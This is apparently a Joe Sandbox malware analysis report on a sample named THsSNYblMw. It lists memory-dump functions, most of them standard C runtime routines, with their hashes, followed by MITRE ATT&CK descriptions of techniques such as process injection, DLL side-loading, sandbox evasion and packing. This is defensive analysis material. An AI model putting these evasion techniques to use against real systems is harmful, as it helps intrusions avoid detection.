Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction ID: fc3356a245b7c2e276d646be861a46cb168222519ff50ed9b42eb79452a37d34
Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction Fuzzy Hash: C611BF30218B088FC758EF1CA48576AB7E1FB98324F1047AEA019C72A1CB74C844C782

Function 006BD7A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006BD7F1

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_invalid_parameter_noinfo.LIBCMT ref: 006BD7FC

Strings

B, xrefs: 006BD828

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction ID: 50f977ece5a03d251763cdab6e5860b7958fa27521cbfee46de87ed944250444
Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction Fuzzy Hash: 690184B2624B4086EB109F12D440799B666F798FE4F584325EF581BB95DF38C585CB04

Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Unknown error, xrefs: 00401D2C

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
Instruction ID: 8762e6e2ae6541d4c7c6524eaf70c560080aac858bcbb5099d5ba83032827fc6
Opcode Fuzzy Hash: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
Instruction Fuzzy Hash: 1E016163D18F88C2D6018F18E8003AB7331FB6E749F259316EB8C3A565DB79D592C704

Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Overflow range error (OVERFLOW), xrefs: 00401D00
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
Instruction ID: c612fb770c622c5d72669c3638e63aa4b2f428d8e56e9d424d6433c91b575293
Opcode Fuzzy Hash: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
Instruction Fuzzy Hash: 6FF01D62958E8882D2029F1DE4003AB7331FB9EB99F68531AEF8D3A555DB29D5828704

Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
The result is too small to be represented (UNDERFLOW), xrefs: 00401D10

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
Instruction ID: abe9318e7ccd880ee09ac2f980ce11207d3172f5f88a25f0641f3127fee3ffee
Opcode Fuzzy Hash: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
Instruction Fuzzy Hash: 77F06D62858E8882D2029F1DE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704

Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Total loss of significance (TLOSS), xrefs: 00401D20
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
Instruction ID: 7a53e470b351231260d633d6082b1e766a8645853782131be27a1b39d9499402
Opcode Fuzzy Hash: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
Instruction Fuzzy Hash: 52F01262958E8882D2029F1DE4003AB7331FB9E799F245316EF8D3A555DB39D5828704

Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Argument domain error (DOMAIN), xrefs: 00401CE0

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
Instruction ID: 8c7bf1553abe8d1c1cf5b10b417118f64097995adaaa4f0d994d3f7e231e07fb
Opcode Fuzzy Hash: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
Instruction Fuzzy Hash: ECF06D62858E8882D2029F1CE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704

Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Partial loss of significance (PLOSS), xrefs: 00401CF0

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
Instruction ID: 5cd091db9141fe0e6e89e9efff11c316d26cc63b3b889972c32c6c159b948a40
Opcode Fuzzy Hash: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
Instruction Fuzzy Hash: C4F06262858E8882D2029F1CE4003AB7331FB5E788F245316EF8D3A555DB28D5828704

Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Argument singularity (SIGN), xrefs: 00401C78

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
Instruction ID: b6e0ecebc6e2091bb6bcdfd9ecb9f8b620cfa756c99f7cd1274eda0ebaf44184
Opcode Fuzzy Hash: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
Instruction Fuzzy Hash: CBF03062954F8882D202DF2DE4003AB7331FB5EB9DF649316EF8D3A555DB29D5828704

Function 006A1CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 006A1D6A

Part of subcall function 006CCCC8: _calloc_impl.LIBCMT ref: 006CCCD8
Part of subcall function 006CCCC8: _errno.LIBCMT ref: 006CCCEB
Part of subcall function 006CCCC8: _errno.LIBCMT ref: 006CCCF5

free.LIBCMT ref: 006A1EF3
free.LIBCMT ref: 006A1EFD
free.LIBCMT ref: 006A1F0F

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
Opcode ID: 28a1bee2ed890e7cf2c8c28a8ac5cd76316822a62f845b1d042dc32352d46813
Instruction ID: d8c1ebae62a5c87298c1e10e83cb3c98b608ba35f9275545c680703717028f62
Opcode Fuzzy Hash: 28a1bee2ed890e7cf2c8c28a8ac5cd76316822a62f845b1d042dc32352d46813
Instruction Fuzzy Hash: BBC11A36604B85CAD764DF65E88079EB7B5F789B88F10412AEB8D87B18EF78C455CB00

Function 0352875B Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0352878F

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

free.LIBCMT ref: 035288D6
free.LIBCMT ref: 0352893A
free.LIBCMT ref: 03528946

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction ID: 077ff418cc3254412f41c513ad12c8af8a182dffcedbf19787d7fa1707b24d80
Opcode Fuzzy Hash: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction Fuzzy Hash: B051A535318A294BDB18EB68E49067D77F1FBCA310F14092DE45BC72E5DE38D9428786

Function 0351DD1F Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0351DDBC

Part of subcall function 0352C9C3: _errno.LIBCMT ref: 0352C9FA
Part of subcall function 0352C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0352CA05

_snprintf.LIBCMT ref: 0351DDD8
_snprintf.LIBCMT ref: 0351DE4E
_snprintf.LIBCMT ref: 0351DE65

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction ID: 14c5671c543e9b23d7ea11adcc3127c9a66f60b9779084b7cde41cd01aa03721
Opcode Fuzzy Hash: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction Fuzzy Hash: 7361EB35618B498FEB55EF18E880BAA77F5FBE5300F104569D44AC32A1DF34D945CB42

Function 03513747 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 035137AA

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction ID: 7df2235705bc9add40766bb75521f73e23a1fd73a54e9c67c25a9fdadaa084dd
Opcode Fuzzy Hash: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction Fuzzy Hash: 6841F335718B064FEB1CDF2CE4A113AB3E5FB8930070449ADD89BC3266EE60E8168781

Function 006B9314 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006B9348

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

free.LIBCMT ref: 006B948F
free.LIBCMT ref: 006B94F3
free.LIBCMT ref: 006B94FF

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno$AllocHeap_callnewhmalloc
String ID:
API String ID: 3531731211-0
Opcode ID: 32250396aac46cb3c7f4cfd35d08813239d5f5291beebfd262bb8bbf460cd738
Instruction ID: 0c8fdf6639c5380115a331e6aedd69262858fd80e0a9ab2210769bfe173f749a
Opcode Fuzzy Hash: 32250396aac46cb3c7f4cfd35d08813239d5f5291beebfd262bb8bbf460cd738
Instruction Fuzzy Hash: 575125B630034582DE68AF22E4513ED6397FB80BC0F140429EF1A5BB56DF7AC596C704

Function 006A4300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006A4363

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 800eff24e48460816e58490102702d178b1ef3e3c2011002697bd4503662d013
Instruction ID: fba9ffd423d6751cf908831012ee0eb15e3004fdf2a3cb10856b55d84446af1f
Opcode Fuzzy Hash: 800eff24e48460816e58490102702d178b1ef3e3c2011002697bd4503662d013
Instruction Fuzzy Hash: B141B27230478197CB58EB26E8507AD73A2F7CAB88F444529DE2A47B05EF79DC46CB00

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

